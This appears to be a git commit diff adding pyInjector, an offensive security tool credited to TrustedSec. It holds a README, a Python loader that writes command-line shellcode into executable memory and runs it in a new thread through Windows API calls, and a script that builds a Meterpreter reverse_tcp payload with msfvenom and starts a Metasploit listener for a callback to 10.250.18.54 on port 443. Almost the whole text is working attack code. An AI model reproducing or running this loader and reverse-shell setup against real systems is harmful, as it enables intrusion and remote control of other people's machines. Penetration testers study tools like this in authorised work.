Add files via upload

pyInjector/pyInjector/README.txt

@@ -0,0 +1,8 @@
+Copy the shellcode.py to your Ubuntu/BT box. Make sure you change the path in the file to where MSFVenom is located at.
+
+Also change the IP addresses and Ports you want for the reverse shell. 
+
+Run shellcode.py, this will generate the proper format for the shellcode. Copy and paste the shellcode into pyinjector.exe:
+
+pyinjector.exe <shellcode>
+

pyInjector/pyInjector/pyinjector.py

@@ -0,0 +1,52 @@
+#!/usr/bin/python
+import ctypes
+import sys
+# PyInjector Written by Dave Kennedy (ReL1K) @ TrustedSec.com
+# Injects shellcode into memory through Python and ctypes
+#
+# Initial awesome code and credit found here:
+# http://www.debasish.in/2012_04_01_archive.html 
+
+# see if we specified shellcode
+try:
+    shellcode = sys.argv[1]
+
+# if we didn't specify a param
+except IndexError:
+    print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec"
+    print "Example: pyinjector.exe \\x41\\x41\\x41\\x41"
+    print "Usage: pyinjector.exe <shellcode>"
+    sys.exit()
+
+# need to code the input into the right format through string escape
+shellcode = shellcode.decode("string_escape")
+
+# convert to bytearray
+shellcode = bytearray(shellcode)
+
+# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
+ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
+                                          ctypes.c_int(len(shellcode)),
+                                          ctypes.c_int(0x3000),
+                                          ctypes.c_int(0x40))
+
+# use virtuallock to lock region for physical address space
+ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
+                                   ctypes.c_int(len(shellcode)))
+
+# read in the buffer
+buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
+
+#  moved the memory in 4 byte blocks
+ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
+                                     buf,
+                                     ctypes.c_int(len(shellcode)))
+# launch in a thread 
+ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(ptr),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.pointer(ctypes.c_int(0)))
+# waitfor singleobject
+ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

pyInjector/pyInjector/shellcode_generate.py

@@ -0,0 +1,26 @@
+# quick script that generates the proper format for the shellcode to feed into pyinjector
+# generates powershell payload
+import subprocess,re
+def generate_powershell_shellcode(payload,ipaddr,port):
+    # grab the metasploit path
+    msf_path = "/opt/metasploit/msf3/"
+    # generate payload
+    proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
+    data = proc.communicate()[0]
+    # start to format this a bit to get it ready
+    data = data.replace(";", "")
+    data = data.replace(" ", "")
+    data = data.replace("+", "")
+    data = data.replace('"', "")
+    data = data.replace("\n", "")
+    data = data.replace("buf=", "")
+    data = data.rstrip()
+    # base counter
+    print data
+
+generate_powershell_shellcode("windows/meterpreter/reverse_tcp", "10.250.18.54", "443")
+
+choice = raw_input("start listener? [y/n]: ")
+
+if choice == "y":
+        subprocess.Popen("msfcli multi/handler payload=windows/meterpreter/reverse_tcp LPORT=443 LHOST=10.250.18.54 E", shell=True).wait()